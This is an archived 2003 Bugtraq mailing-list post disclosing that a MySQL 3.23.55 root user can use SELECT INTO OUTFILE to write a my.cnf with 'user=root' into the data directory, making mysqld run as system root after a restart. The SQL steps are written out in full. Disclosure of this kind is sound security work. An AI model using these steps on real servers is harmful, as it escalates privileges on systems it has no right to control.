[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    =?iso-8859-1?Q?MySQL_user_can_be_changed_to_root?=
From:       "=?iso-8859-1?Q?bugsman () libero ! it?=" <bugsman () libero ! it>
Date:       2003-03-08 11:58:37
[Download RAW message or body]

Hi. I tried this on my own MySQL 3.23.55 !!!
I found out that logging as the root user, we can change mysqld to run as root \
instead that i.e. mysql but this works only if there's just one my.cnf file and it is \
locate in /etc... Here's how I did it...

I logged in as root and than I did this:

mysql>CREATE DATABASE roottext;
mysql>USE roottext;
mysql>CREATE TABLE hack (conf VARCHAR(80));
mysql>INSERT IN hack VALUES ('[mysqld]');
mysql>INSERT IN hack VALUES ('user=root');
mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack
mysql>QUIT

Doing so we have create a my.cnf in mysql datadir containing:

[mysqld]
user=root

Now, when the mysql server will be restarted, the user option in our datadit my.cnf \
will override the one in /etc/my.cnf and mysql server will run as root, with all the \
security flwas that it takes... This is very dangerous if we think that in mysql <= \
3.23.53 it is really easy to get root access due to a bug (an exploit has been \
released publicly)... I dunno how this problem can be solved, I'd like to hear from \
you something... Thanks.... :)
by
Gufino


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic